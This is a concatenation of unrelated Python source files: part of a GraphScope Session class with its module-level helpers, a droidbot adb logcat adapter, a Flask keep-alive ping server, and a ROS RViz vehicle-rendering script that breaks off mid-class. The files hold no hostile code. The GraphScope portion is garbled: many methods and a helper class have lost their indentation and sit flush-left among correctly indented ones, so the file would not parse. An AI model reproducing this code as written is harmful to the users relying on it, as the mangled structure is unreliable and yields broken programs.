            "k8s_image_pull_policy",
            "k8s_image_pull_secrets",
            "k8s_coordinator_cpu",
            "k8s_coordinator_mem",
            "k8s_etcd_num_pods",
            "k8s_etcd_cpu",
            "k8s_etcd_mem",
            "k8s_vineyard_daemonset",
            "k8s_vineyard_cpu",
            "k8s_vineyard_mem",
            "vineyard_shared_mem",
            "k8s_engine_cpu",
            "k8s_engine_mem",
            "k8s_mars_worker_cpu",
            "k8s_mars_worker_mem",
            "k8s_mars_scheduler_cpu",
            "k8s_mars_scheduler_mem",
            "with_mars",
            "reconnect",
            "k8s_volumes",
            "k8s_waiting_for_delete",
            "timeout_seconds",
            "dangling_timeout_seconds",
            "mount_dataset",
            "k8s_dataset_image",
        )
        self._deprecated_params = (
            "show_log",
            "log_level",
            "k8s_vineyard_shared_mem",
            "k8s_gie_graph_manager_image",
            "k8s_gie_graph_manager_cpu",
            "k8s_gie_graph_manager_mem",
            "k8s_zookeeper_image",
            "k8s_zookeeper_cpu",
            "k8s_zookeeper_mem",
        )
        # Snapshot the call frame so the declared keyword arguments can be
        # collected generically by name instead of listing each one again.
        saved_locals = locals()
        for param in self._accessable_params:
            self._config_params[param] = saved_locals[param]
        # parse config, which should be a path to config file, or dict
        # config has highest priority
        if isinstance(config, dict):
            self._config_params.update(config)
        elif isinstance(config, str):
            self._load_config(config, slient=False)
        elif DEFAULT_CONFIG_FILE:
            self._load_config(DEFAULT_CONFIG_FILE)
        # update other optional params
        self._config_params.update(kw)
        # initial setting of cluster_type
        self._cluster_type = self._parse_cluster_type()
        # initial dag
        self._dag = Dag()
        # mars cannot work with run-on-local mode
        if self._cluster_type == types_pb2.HOSTS and self._config_params["with_mars"]:
            raise NotImplementedError(
                "Mars cluster cannot be launched along with local GraphScope deployment"
            )
        # deprecated params handle: warn once per supplied deprecated kwarg,
        # then drop it from `kw` so the leftover-kwargs check below stays clean.
        for param in self._deprecated_params:
            if param in kw:
                warnings.warn(
                    "The `{0}` parameter has been deprecated and has no effect.".format(
                        param
                    ),
                    category=DeprecationWarning,
                )
                if param == "show_log" or param == "log_level":
                    warnings.warn(
                        "Please use `graphscope.set_option({0}={1})` instead".format(
                            param, kw.pop(param, None)
                        ),
                        category=DeprecationWarning,
                    )
                if param == "k8s_vineyard_shared_mem":
                    warnings.warn(
                        "Please use 'vineyard_shared_mem' instead",
                        category=DeprecationWarning,
                    )
                kw.pop(param, None)
        # update k8s_client_config params
        self._config_params["k8s_client_config"] = kw.pop("k8s_client_config", {})
        # There should be no more custom keyword arguments.
        if kw:
            raise ValueError("Value not recognized: ", list(kw.keys()))
        if self._config_params["addr"]:
            logger.info(
                "Connecting graphscope session with address: %s",
                self._config_params["addr"],
            )
        else:
            logger.info(
                "Initializing graphscope session with parameters: %s",
                self._config_params,
            )
        self._closed = False
        # coordinator service endpoint
        self._coordinator_endpoint = None
        self._launcher = None
        self._heartbeat_sending_thread = None
        self._grpc_client = None
        self._session_id = None  # unique identifier across sessions
        # engine config:
        #
        # {
        #     "experiment": "ON/OFF",
        #     "vineyard_socket": "...",
        #     "vineyard_rpc_endpoint": "..."
        # }
        self._engine_config = None
        # interactive instance related graph map
        self._interactive_instance_dict = {}
        # learning engine related graph map
        self._learning_instance_dict = {}
        self._default_session = None
        # Ensure resources are released even if the user never calls close().
        atexit.register(self.close)
        # create and connect session
        with CaptureKeyboardInterrupt(self.close):
            self._connect()
        self._disconnected = False
        # heartbeat: a daemon thread keeps the coordinator's dangling check at bay
        self._heartbeat_interval_seconds = 5
        self._heartbeat_sending_thread = threading.Thread(
            target=self._send_heartbeat, args=()
        )
        self._heartbeat_sending_thread.daemon = True
        self._heartbeat_sending_thread.start()
        # networkx module
        self._nx = None
def __repr__(self):
return str(self.info)
def __str__(self):
return repr(self)
    @property
    def session_id(self):
        """str: Unique identifier of this session, assigned by the coordinator on connect."""
        return self._session_id
    @property
    def dag(self):
        """The operation DAG accumulated by this session (used in lazy mode)."""
        return self._dag
def _load_config(self, path, slient=True):
config_path = os.path.expandvars(os.path.expanduser(path))
try:
with open(config_path, "r") as f:
data = json.load(f)
self._config_params.update(data)
except Exception as exp: # noqa
if not slient:
raise exp
def _parse_cluster_type(self):
# get the cluster type after connecting
cluster_type = types_pb2.UNDEFINED
if self._config_params["addr"] is None:
if self._config_params["cluster_type"] == "hosts":
self._run_on_local()
cluster_type = types_pb2.HOSTS
elif self._config_params["cluster_type"] == "k8s":
cluster_type = types_pb2.K8S
else:
raise ValueError("Expect hosts or k8s of cluster_type parameter")
return cluster_type
    @property
    def engine_config(self):
        """Show the engine configuration associated with session in json format."""
        return self._engine_config
@property
def info(self):
"""Show all resources info associated with session in json format."""
info = {}
if self._closed:
info["status"] = "closed"
elif self._grpc_client is None or self._disconnected:
info["status"] = "disconnected"
else:
info["status"] = "active"
if self._cluster_type == types_pb2.K8S:
info["type"] = "k8s"
info["engine_hosts"] = ",".join(self._pod_name_list)
info["namespace"] = self._config_params["k8s_namespace"]
else:
info["type"] = "hosts"
info["engine_hosts"] = self._engine_config["engine_hosts"]
info["cluster_type"] = str(self._cluster_type)
info["session_id"] = self.session_id
info["num_workers"] = self._config_params["num_workers"]
info["coordinator_endpoint"] = self._coordinator_endpoint
info["engine_config"] = self._engine_config
return info
    @property
    def closed(self):
        """bool: True once :meth:`close` has completed."""
        return self._closed
def eager(self):
return self._config_params["mode"] == "eager"
    def _send_heartbeat(self):
        """Background loop: ping the coordinator every few seconds.

        Runs in a daemon thread until :meth:`close` flips ``self._closed``.
        A failed heartbeat marks the session disconnected; a later successful
        one marks it connected again.
        """
        while not self._closed:
            if self._grpc_client:
                try:
                    self._grpc_client.send_heartbeat()
                except Exception as exc:
                    logger.warning(exc)
                    self._disconnected = True
                else:
                    # heartbeat succeeded -> (re-)mark the session as connected
                    self._disconnected = False
            time.sleep(self._heartbeat_interval_seconds)
    def close(self):
        """Closes this session.
        This method frees all resources associated with the session.
        Note that closing will ignore SIGINT and SIGTERM signal and recover later.
        """
        # Block Ctrl-C / SIGTERM during teardown so cleanup cannot be cut short.
        with SignalIgnore([signal.SIGINT, signal.SIGTERM]):
            self._close()
    def _close(self):
        """Actual teardown: stop heartbeat, close engine instances, release cluster.

        Idempotent — a second call returns immediately.  Each step is
        best-effort so one failing resource does not leak the others.
        """
        if self._closed:
            return
        # NOTE(review): fixed grace period before teardown — presumably to let
        # in-flight requests drain; confirm whether 5s is still required.
        time.sleep(5)
        self._closed = True
        self._coordinator_endpoint = None
        self._deregister_default()
        if self._heartbeat_sending_thread:
            self._heartbeat_sending_thread.join(
                timeout=self._heartbeat_interval_seconds
            )
            self._heartbeat_sending_thread = None
            self._disconnected = True
        # close all interactive instances
        for instance in self._interactive_instance_dict.values():
            try:
                if instance is not None:
                    instance.close()
            except Exception:
                pass
        self._interactive_instance_dict.clear()
        # close all learning instances
        for instance in self._learning_instance_dict.values():
            try:
                if instance is not None:
                    instance.close()
            except Exception:
                pass
        self._learning_instance_dict.clear()
        if self._grpc_client:
            try:
                self._grpc_client.close()
            except Exception:
                pass
            self._grpc_client = None
            _session_dict.pop(self._session_id, None)
        # clean up launched cluster (only when we launched it ourselves)
        if self._config_params["addr"] is None:
            try:
                if self._launcher:
                    self._launcher.stop()
            except Exception:
                pass
            self._pod_name_list = []
def _close_interactive_instance(self, instance):
"""Close a interactive instance."""
if self.eager():
self._interactive_instance_dict[instance.object_id] = None
def _close_learning_instance(self, instance):
"""Close a learning instance."""
if self.eager():
self._learning_instance_dict[instance.object_id] = None
    def __del__(self):
        # cleanly ignore all exceptions — raising during GC is never useful
        try:
            self.close()
        except Exception:  # pylint: disable=broad-except
            pass
def _check_closed(self, msg=None):
"""Internal: raise a ValueError if session is closed"""
if self.closed:
raise ValueError(msg or "Operation on closed session.")
    # Context manager
    def __enter__(self):
        """Context management protocol.
        Returns self and register self as default session.
        """
        self._check_closed()
        self.as_default()
        return self
def __exit__(self, exc_type, exc_value, exc_tb):
"""Deregister self from the default session,
close the session and release the resources, ignore all exceptions in close().
"""
try:
self._deregister_default()
self.close()
except Exception:
pass
def as_default(self):
"""Obtain a context manager that make this object as default session.
This method is used when a Session is constructed, which will immediately
install self as a default session.
Raises:
ValueError: If default session exist in current context.
Returns:
A context manager using this session as the default session.
"""
if not _default_session_stack.is_cleared():
raise ValueError(
"A default session is already active. You must explicitly call Session.close()."
)
# session context manager
self._default_session = default_session(self)
self._default_session.__enter__()
def _deregister_default(self):
"""Remove self from the default session stack."""
if self._default_session:
self._default_session.__exit__(None, None, None)
self._default_session = None
def _wrapper(self, dag_node):
if self.eager():
return self.run(dag_node)
return dag_node
    def run(self, fetches, debug=False):
        """Run operations of `fetches`.
        Args:
            fetches: :class:`Operation` (or a collection of them) to evaluate.
            debug (bool, optional): Reserved; currently unused.
        Raises:
            RuntimeError:
                Client disconnect to the service. Or run on a closed session.
            ValueError:
                If fetches is not an instance of :class:`Operation`. Or
                the fetch has been evaluated.
            InvalidArgumentError:
                Not recognized on output type.
        Returns:
            Different values for different output types of :class:`Operation`
        """
        if self._closed:
            raise RuntimeError("Attempted to use a closed Session.")
        if not self._grpc_client:
            raise RuntimeError("Session disconnected.")
        fetch_handler = _FetchHandler(self.dag, fetches)
        try:
            response = self._grpc_client.run(fetch_handler.targets)
        except FatalError:
            # fatal errors leave the backend unusable — tear the session down
            self.close()
            raise
        if not self.eager():
            # Unload operations that cannot be touched anymore
            dag_to_unload = fetch_handler.get_dag_for_unload()
            try:
                self._grpc_client.run(dag_to_unload)
            except FatalError:
                self.close()
                raise
        return fetch_handler.wrap_results(response)
    def _connect(self):
        """Launch (or locate) the coordinator service and establish the gRPC session.

        Depending on configuration this connects to a pre-launched coordinator
        (``addr``), launches a Kubernetes cluster, or launches a local "hosts"
        cluster.  On any failure after launch the session is closed so that
        resources are not leaked.
        """
        if self._config_params["addr"] is not None:
            # try connect to exist coordinator
            self._coordinator_endpoint = self._config_params["addr"]
        elif self._cluster_type == types_pb2.K8S:
            if (
                self._config_params["k8s_etcd_image"] is None
                or self._config_params["k8s_gs_image"] is None
            ):
                raise K8sError("None image found.")
            if isinstance(
                self._config_params["k8s_client_config"],
                kube_client.api_client.ApiClient,
            ):
                # a pre-built kubernetes API client was passed in directly
                api_client = self._config_params["k8s_client_config"]
            else:
                try:
                    api_client = kube_config.new_client_from_config(
                        **self._config_params["k8s_client_config"]
                    )
                except kube_config.ConfigException as e:
                    raise RuntimeError(
                        "Kubernetes environment not found, you may want to"
                        ' launch session locally with param cluster_type="hosts"'
                    ) from e
            self._launcher = KubernetesClusterLauncher(
                api_client=api_client,
                **self._config_params,
            )
        elif (
            self._cluster_type == types_pb2.HOSTS
            and isinstance(self._config_params["hosts"], list)
            and len(self._config_params["hosts"]) != 0
            and self._config_params["num_workers"] > 0
        ):
            # launch coordinator with hosts
            self._launcher = HostsClusterLauncher(
                **self._config_params,
            )
        else:
            raise RuntimeError(
                f"Unrecognized cluster type {types_pb2.ClusterType.Name(self._cluster_type)}."
            )
        # launching graphscope service
        if self._launcher is not None:
            self._launcher.start()
            self._coordinator_endpoint = self._launcher.coordinator_endpoint
        # waiting service ready
        self._grpc_client = GRPCClient(
            self._launcher, self._coordinator_endpoint, self._config_params["reconnect"]
        )
        self._grpc_client.waiting_service_ready(
            timeout_seconds=self._config_params["timeout_seconds"],
        )
        # connect and fetch logs from rpc server; the coordinator may override
        # cluster type, worker count and namespace, so write them back here
        try:
            (
                self._session_id,
                self._cluster_type,
                self._engine_config,
                self._pod_name_list,
                self._config_params["num_workers"],
                self._config_params["k8s_namespace"],
            ) = self._grpc_client.connect(
                cleanup_instance=not bool(self._config_params["addr"]),
                dangling_timeout_seconds=self._config_params[
                    "dangling_timeout_seconds"
                ],
            )
            # fetch logs
            if self._config_params["addr"] or self._cluster_type == types_pb2.K8S:
                self._grpc_client.fetch_logs()
            _session_dict[self._session_id] = self
        except Exception:
            # connection failed: release whatever was launched above
            self.close()
            raise
    def get_config(self):
        """Get configuration of the session.

        Returns:
            dict: the fully-resolved configuration parameters of this session.
        """
        return self._config_params
    def g(self, incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
        """Construct a graph bound to this session.

        See params detail in :class:`graphscope.framework.graph.GraphDAGNode`.

        Returns:
            :class:`graphscope.framework.graph.GraphDAGNode`, evaluated in eager mode.
        """
        return self._wrapper(
            GraphDAGNode(self, incoming_data, oid_type, directed, generate_eid)
        )
    def load_from(self, *args, **kwargs):
        """Load a graph within the session.
        See more information in :meth:`graphscope.load_from`.
        """
        # temporarily make this session the default so the module-level
        # loader binds the graph to it
        with default_session(self):
            return graphscope.load_from(*args, **kwargs)
def _run_on_local(self):
self._config_params["hosts"] = ["localhost"]
self._config_params["port"] = None
self._config_params["vineyard_socket"] = ""
    @set_defaults(gs_config)
    def gremlin(self, graph, engine_params=None):
        """Get an interactive engine handler to execute gremlin queries.
        It will return an instance of :class:`graphscope.interactive.query.InteractiveQueryDAGNode`,
        that will be evaluated by :meth:`sess.run` in eager mode.
        Note that this method will be executed implicitly in eager mode when a property graph created
        and cache an instance of InteractiveQuery in session if `initializing_interactive_engine` is True.
        If you want to create a new instance under the same graph by different params, you should close
        the instance first.
        .. code:: python
            >>> # close and recreate InteractiveQuery in eager mode.
            >>> interactive_query = sess.gremlin(g)
            >>> interactive_query.close()
            >>> interactive_query = sess.gremlin(g, engine_params={"xxx":"xxx"})
        Args:
            graph (:class:`graphscope.framework.graph.GraphDAGNode`):
                The graph to create interactive instance.
            engine_params (dict, optional): Configure startup parameters of interactive engine.
                You can also configure this param by `graphscope.set_option(engine_params={})`.
                See a list of configurable keys in
                `interactive_engine/deploy/docker/dockerfile/executor.vineyard.properties`
        Raises:
            InvalidArgumentError:
                - :code:`graph` is not a property graph.
                - :code:`graph` is unloaded in eager mode.
        Returns:
            :class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
                InteractiveQuery to execute gremlin queries, evaluated in eager mode.
        """
        if self._session_id != graph.session_id:
            raise RuntimeError(
                "Failed to create interactive engine on the graph with different session: {0} vs {1}".format(
                    self._session_id, graph.session_id
                )
            )
        # Interactive query instance won't add to self._interactive_instance_dict in lazy mode.
        # self._interactive_instance_dict[graph.vineyard_id] will be None if InteractiveQuery closed
        if (
            self.eager()
            and graph.vineyard_id in self._interactive_instance_dict
            and self._interactive_instance_dict[graph.vineyard_id] is not None
        ):
            interactive_query = self._interactive_instance_dict[graph.vineyard_id]
            if interactive_query.status == InteractiveQueryStatus.Running:
                return interactive_query
            if interactive_query.status == InteractiveQueryStatus.Failed:
                raise InteractiveEngineInternalError(interactive_query.error_msg)
            # Initializing.
            # while True is ok, as the status is either running or failed eventually after timeout.
            # NOTE(review): busy-wait polling at 1s granularity; the status is
            # flipped by a concurrent initialization — confirm against backend.
            while True:
                time.sleep(1)
                if interactive_query.status == InteractiveQueryStatus.Failed:
                    raise InteractiveEngineInternalError(interactive_query.error_msg)
                if interactive_query.status == InteractiveQueryStatus.Running:
                    return interactive_query
        if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
            raise InvalidArgumentError("The graph should be a property graph.")
        if self.eager():
            if not graph.loaded():
                raise InvalidArgumentError("The graph has already been unloaded")
            # cache the instance of interactive query in eager mode
            interactive_query = InteractiveQuery()
            self._interactive_instance_dict[graph.vineyard_id] = interactive_query
        try:
            _wrapper = self._wrapper(
                InteractiveQueryDAGNode(self, graph, engine_params)
            )
        except Exception as e:
            if self.eager():
                interactive_query.status = InteractiveQueryStatus.Failed
                interactive_query.error_msg = str(e)
            raise InteractiveEngineInternalError(str(e)) from e
        else:
            if self.eager():
                interactive_query = _wrapper
                graph._attach_interactive_instance(interactive_query)
        return _wrapper
def learning(self, graph, nodes=None, edges=None, gen_labels=None):
"""Start a graph learning engine.
Note that this method has been deprecated, using `graphlearn` replace.
"""
warnings.warn(
"The method 'learning' has been deprecated, using graphlearn replace."
)
return self.graphlearn(graph, nodes, edges, gen_labels)
    def graphlearn(self, graph, nodes=None, edges=None, gen_labels=None):
        """Start a graph learning engine.
        Args:
            graph (:class:`graphscope.framework.graph.GraphDAGNode`):
                The property graph to create the learning instance on.
            nodes (list): The node types that will be used for gnn training.
            edges (list): The edge types that will be used for gnn training.
            gen_labels (list): Extra node and edge labels on original graph for gnn training.
        Returns:
            :class:`graphscope.learning.GraphDAGNode`:
                An instance of learning graph that could be feed to the learning engine, evaluated in eager node.
        """
        if self._session_id != graph.session_id:
            raise RuntimeError(
                "Failed to create learning engine on the graph with different session: {0} vs {1}".format(
                    self._session_id, graph.session_id
                )
            )
        # reuse a cached learning instance for the same graph in eager mode
        if (
            self.eager()
            and graph.vineyard_id in self._learning_instance_dict
            and self._learning_instance_dict[graph.vineyard_id] is not None
        ):
            return self._learning_instance_dict[graph.vineyard_id]
        if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
            raise InvalidArgumentError("The graph should be a property graph.")
        if self.eager():
            if not graph.loaded():
                raise InvalidArgumentError("The graph has already been unloaded")
        # imported lazily to avoid pulling learning-engine deps at module import
        from graphscope.learning.graph import GraphDAGNode as LearningGraphDAGNode
        _wrapper = self._wrapper(
            LearningGraphDAGNode(self, graph, nodes, edges, gen_labels)
        )
        if self.eager():
            self._learning_instance_dict[graph.vineyard_id] = _wrapper
            graph._attach_learning_instance(_wrapper)
        return _wrapper
    def nx(self):
        """Return a session-bound copy of the ``graphscope.nx`` compatibility module.

        The module is cloned so that its ``Graph``/``DiGraph`` classes can carry
        this session without affecting other sessions.  The clone is cached on
        the session after the first call.
        """
        if not self.eager():
            raise RuntimeError(
                "Networkx module need the session to be eager mode. "
                "Current session is lazy mode."
            )
        if self._nx:
            return self._nx
        import importlib.util
        # load a *fresh* module object instead of the shared sys.modules entry
        spec = importlib.util.find_spec("graphscope.nx")
        mod = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(mod)
        # re-create Graph/DiGraph so each clone owns its own `_session` attribute
        graph = type("Graph", (mod.Graph.__base__,), dict(mod.Graph.__dict__))
        digraph = type("DiGraph", (mod.DiGraph.__base__,), dict(mod.DiGraph.__dict__))
        setattr(graph, "_session", self)
        setattr(digraph, "_session", self)
        setattr(mod, "Graph", graph)
        setattr(mod, "DiGraph", digraph)
        self._nx = mod
        return self._nx
# Lower-case alias so callers can write `graphscope.session(...)`.
session = Session
def set_option(**kwargs):
    """Set the value of specified options.
    Find params detail in :class:`graphscope.Session`
    Available options:
        - num_workers
        - log_level
        - show_log
        - vineyard_shared_mem
        - k8s_namespace
        - k8s_service_type
        - k8s_gs_image
        - k8s_etcd_image
        - k8s_image_pull_policy
        - k8s_image_pull_secrets
        - k8s_coordinator_cpu
        - k8s_coordinator_mem
        - k8s_vineyard_daemonset
        - k8s_vineyard_cpu
        - k8s_vineyard_mem
        - k8s_engine_cpu
        - k8s_engine_mem
        - k8s_mars_worker_cpu
        - k8s_mars_worker_mem
        - k8s_mars_scheduler_cpu
        - k8s_mars_scheduler_mem
        - with_mars
        - k8s_volumes
        - k8s_waiting_for_delete
        - engine_params
        - initializing_interactive_engine
        - timeout_seconds
    Args:
        kwargs: dict
            kv pair of GraphScope config you want to set.
    Raises:
        ValueError: If no such option exists.
    Returns: None
    """
    # Validate every key first so either all options are applied or none are.
    for k in kwargs:
        if not hasattr(gs_config, k):
            raise ValueError(f"No such option {k} exists.")
    for k, v in kwargs.items():
        setattr(gs_config, k, v)
    # re-apply logging-related options
    GSLogger.update()
def get_option(key):
    """Get the value of specified option.
    Find params detail in :class:`graphscope.Session`
    Available options:
        - num_workers
        - log_level
        - show_log
        - vineyard_shared_mem
        - k8s_namespace
        - k8s_service_type
        - k8s_gs_image
        - k8s_etcd_image
        - k8s_image_pull_policy
        - k8s_image_pull_secrets
        - k8s_coordinator_cpu
        - k8s_coordinator_mem
        - k8s_vineyard_daemonset
        - k8s_vineyard_cpu
        - k8s_vineyard_mem
        - k8s_engine_cpu
        - k8s_engine_mem
        - k8s_mars_worker_cpu
        - k8s_mars_worker_mem
        - k8s_mars_scheduler_cpu
        - k8s_mars_scheduler_mem
        - with_mars
        - k8s_volumes
        - k8s_waiting_for_delete
        - engine_params
        - initializing_interactive_engine
        - timeout_seconds
    Args:
        key: str
            Key of GraphScope config you want to get.
    Raises:
        ValueError: If no such option exists.
    Returns: result: the value of the option
    """
    if not hasattr(gs_config, key):
        raise ValueError("No such option {} exists.".format(key))
    return getattr(gs_config, key)
def default_session(session):
    """Python's :code:`with` handler for defining a default session.
    This function provides a means of registering a session as the default
    for any code that needs a default session to run against.
    Use the :code:`with` keyword to specify that code invocations within
    the scope of a block should be executed by a particular session.
    Args:
        session: :class:`Session`
            The session to be installed as the default session.
    Returns:
        A context manager for the default session.
    """
    return _default_session_stack.get_controller(session)
def get_default_session():
    """Return the default session for the current context.

    A local session is created lazily by the stack when none has been
    registered yet.

    Raises:
        RuntimeError: Default session does not exist.

    Returns:
        The default :class:`Session`.
    """
    return _default_session_stack.get_default()
def get_session_by_id(handle):
    """Return the registered session identified by *handle*.

    Raises:
        ValueError: If no session with that handle is registered.
    """
    if handle in _session_dict:
        return _session_dict[handle]
    raise ValueError("Session {} not exists.".format(handle))
class _DefaultSessionStack(object):
"""A stack of objects for providing implicit defaults."""
def __init__(self):
super().__init__()
self.stack = []
def get_default(self):
if not self.stack:
logger.info("Creating default session ...")
sess = session(cluster_type="hosts", num_workers=1)
sess.as_default()
return self.stack[-1]
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
self.stack.append(default)
try:
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
self.stack.remove(default)
# Module-level singleton holding the implicit default-session stack.
_default_session_stack = _DefaultSessionStack()  # pylint: disable=protected-access
def g(incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
    """Construct a GraphScope graph object on the default session.

    It will launch and set a session to default when there is no default
    session found. See params detail in
    :class:`graphscope.framework.graph.GraphDAGNode`.

    Returns:
        :class:`graphscope.framework.graph.GraphDAGNode`: Evaluated in eager mode.

    Examples:
        .. code:: python

            >>> import graphscope
            >>> g = graphscope.g()

            >>> import graphscope
            >>> sess = graphscope.session()
            >>> sess.as_default()
            >>> g = graphscope.g()  # creating graph on the session "sess"
    """
    default_sess = get_default_session()
    return default_sess.g(incoming_data, oid_type, directed, generate_eid)
def gremlin(graph, engine_params=None):
    """Create an interactive engine and return a handler for gremlin queries.

    See params detail in :meth:`graphscope.Session.gremlin`.

    Returns:
        :class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
            InteractiveQuery to execute gremlin queries, evaluated in eager mode.

    Raises:
        RuntimeError: If no default session is found.

    Examples:
        .. code:: python

            >>> import graphscope
            >>> g = graphscope.g()
            >>> interactive_query = graphscope.gremlin(g)
    """
    if _default_session_stack.is_cleared():
        raise RuntimeError("No default session found.")
    sess = get_default_session()
    return sess.gremlin(graph, engine_params)
def graphlearn(graph, nodes=None, edges=None, gen_labels=None):
    """Create a graph learning engine on the default session.

    See params detail in :meth:`graphscope.Session.graphlearn`.

    Returns:
        :class:`graphscope.learning.GraphDAGNode`:
            An instance of learning graph that could be fed to the learning
            engine, evaluated in eager mode.

    Raises:
        RuntimeError: If no default session is found.

    Example:
        .. code:: python

            >>> import graphscope
            >>> g = graphscope.g()
            >>> lg = graphscope.graphlearn(g)
    """
    if _default_session_stack.is_cleared():
        # Fixed typo in the error message ("No de fault" -> "No default").
        raise RuntimeError("No default session found.")
    return get_default_session().graphlearn(graph, nodes, edges, gen_labels)
|
logcat.py | import subprocess
import logging
from .adapter import Adapter
class Logcat(Adapter):
    """
    A connection with the target device through logcat.

    Spawns ``adb logcat`` as a subprocess and consumes its output on a
    background thread, optionally mirroring each line to
    ``<output_dir>/logcat.txt``.
    """

    def __init__(self, device=None):
        """
        initialize logcat connection
        :param device: a Device instance; a fresh Device is created when omitted
        """
        self.logger = logging.getLogger(self.__class__.__name__)
        if device is None:
            from droidbot.device import Device
            device = Device()
        self.device = device
        self.connected = False  # True while the reader thread is active
        self.process = None     # the adb logcat subprocess
        if device.output_dir is None:
            self.out_file = None
        else:
            self.out_file = "%s/logcat.txt" % device.output_dir

    def connect(self):
        """Start the logcat subprocess and a thread consuming its output."""
        # self.device.adb.run_cmd("logcat -c")
        self.process = subprocess.Popen(["adb", "-s", self.device.serial, "logcat", "-v", "threadtime"],
                                        stdin=subprocess.PIPE,
                                        stderr=subprocess.PIPE,
                                        stdout=subprocess.PIPE)
        import threading
        listen_thread = threading.Thread(target=self.handle_output)
        listen_thread.start()

    def disconnect(self):
        """Stop the reader loop and terminate the adb subprocess."""
        self.connected = False
        if self.process is not None:
            self.process.terminate()

    def check_connectivity(self):
        """Return True while the reader thread is running."""
        return self.connected

    def handle_output(self):
        """Reader loop: forward each logcat line to parse_line / the log file."""
        self.connected = True
        f = None
        if self.out_file is not None:
            f = open(self.out_file, 'w', encoding='utf-8')
        try:
            while self.connected:
                if self.process is None:
                    continue
                line = self.process.stdout.readline()
                if not line:
                    # BUG FIX: readline() returns b'' on EOF (adb died or was
                    # terminated); the old code busy-spun forever on empty lines.
                    break
                if not isinstance(line, str):
                    line = line.decode()
                self.parse_line(line)
                if f is not None:
                    f.write(line)
        finally:
            # BUG FIX: close the mirror file even if reading/parsing raises.
            if f is not None:
                f.close()
            self.connected = False
        print("[CONNECTION] %s is disconnected" % self.__class__.__name__)

    def parse_line(self, logcat_line):
        # Hook for subclasses; the base adapter ignores every line.
        pass
|
keep_alive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
    """Root endpoint answered to uptime pingers."""
    return "My existence depends on pings!"
def run():
    """Serve the Flask app on all interfaces, port 8080 (blocking)."""
    app.run(host='0.0.0.0', port=8080)
def keep_alive():
    """Start the ping web server on a background thread and return."""
    worker = Thread(target=run)
    worker.start()
render_environment.py | #!usr/env/bin/python
import rospy
import time
import random
import tf
import numpy as np
from threading import Thread
from visualization_msgs.msg import *
from simulation.msg import *
from simulation.srv import *
from geometry_msgs.msg import Point
rospy.init_node("Render")
# Latched publisher that pushes every marker update to RViz.
rviz = rospy.Publisher("visualization_msgs", Marker, queue_size=0, latch=True)
speed = 0.1            # distance per interpolation step when building paths
current_time = [0]     # one-element list so threads share a mutable clock
path_resolution = 5    # keep every Nth interpolated sample in the drawn path
parking_times = []     # durations of completed "parking" runs (seconds)
returning_times = []   # durations of completed "returning" runs (seconds)
vehicles = []          # all Car instances currently being rendered
# class which takes care of all the aspects of a vehicle
class Car:
    """All rendering state for one vehicle: its RViz markers, path and timing."""

    def __init__(self, vehicle_id, path, size):
        # set the markers associated with this vehicle
        self.vehicle_marker = Marker()
        self.vehicle_marker.action = Marker.ADD
        self.destination_marker = Marker()
        self.path_marker = Marker()
        self.vehicle_marker.type = Marker.CUBE
        self.destination_marker.type = Marker.CYLINDER
        self.path_marker.type = Marker.LINE_STRIP
        self.vehicle_marker.ns = "Vehicle"
        self.destination_marker.ns = "Markers"
        self.path_marker.ns = "Path"
        self.state = "idle"
        self.vehicle_marker.color.a = 1
        self.destination_marker.color.a = 1
        self.path_marker.color.a = 1
        # one random RGB colour shared by all three markers of this vehicle
        self.color = [round(random.random(), 2) for _ in range(0, 3)]
        self.id = vehicle_id
        self.vehicle_path = path
        self.motion_start = 0
        # alias the global clock list so move() always sees the latest time
        self.motion_current = current_time
        self.motion = 0
        self.path_index = 0
        self.interpolated_path = []
        self.vehicle_marker.id = vehicle_id
        self.destination_marker.id = vehicle_id
        # BUG FIX: was ``self.path_marker = vehicle_id``, which replaced the
        # Marker object with an int and broke the colour assignment below.
        self.path_marker.id = vehicle_id
        self.vehicle_marker.color.r, self.vehicle_marker.color.g, self.vehicle_marker.color.b = self.color
        self.destination_marker.color.r, self.destination_marker.color.g, self.destination_marker.color.b = self.color
        self.path_marker.color.r, self.path_marker.color.g, self.path_marker.color.b = self.color
        self.vehicle_marker.scale.x, self.vehicle_marker.scale.y, self.vehicle_marker.scale.z = [size, 0.4, 0.5]
        self.destination_marker.scale.x, self.destination_marker.scale.y, self.destination_marker.scale.z = [size, size, 0.1]
        self.destination_marker.scale.x = 1
        self.vehicle_marker.pose.orientation.x, self.vehicle_marker.pose.orientation.y, self.vehicle_marker.pose.orientation.z, self.vehicle_marker.pose.orientation.w = [0, 0, 0, 1]
        self.destination_marker.pose.orientation.x, self.destination_marker.pose.orientation.y, self.destination_marker.pose.orientation.z, self.destination_marker.pose.orientation.w = [0, 0, 0, 1]
        self.vehicle_marker.pose.position.x, self.vehicle_marker.pose.position.y, self.vehicle_marker.pose.position.z = [0, 0, 0]
        self.destination_marker.pose.position.x, self.destination_marker.pose.position.y, self.destination_marker.pose.position.z = [0, 0, 0]

    def quatfromang(self, yaw):
        # get quaternion for euler angles (roll = pitch = 0)
        return tf.transformations.quaternion_from_euler(0, 0, yaw)

    def move(self):
        # update the state of the vehicle; samples are 0.1 s apart, so the
        # elapsed time indexes directly into the interpolated path
        self.path_index = int((self.motion_current[0] - self.motion_start)/0.1)
        if self.path_index >= len(self.interpolated_path):
            # past the end of the path: snap to the final pose and finish
            self.vehicle_marker.pose.position.x, self.vehicle_marker.pose.position.y = self.interpolated_path[-1][0:2]
            self.vehicle_marker.pose.orientation.x, self.vehicle_marker.pose.orientation.y, self.vehicle_marker.pose.orientation.z, self.vehicle_marker.pose.orientation.w = self.quatfromang(self.interpolated_path[-1][2])
            self.clear_path()
        else:
            self.vehicle_marker.pose.position.x, self.vehicle_marker.pose.position.y = self.interpolated_path[self.path_index][0:2]
            self.vehicle_marker.pose.orientation.x, self.vehicle_marker.pose.orientation.y, self.vehicle_marker.pose.orientation.z, self.vehicle_marker.pose.orientation.w = self.quatfromang(self.interpolated_path[self.path_index][2])
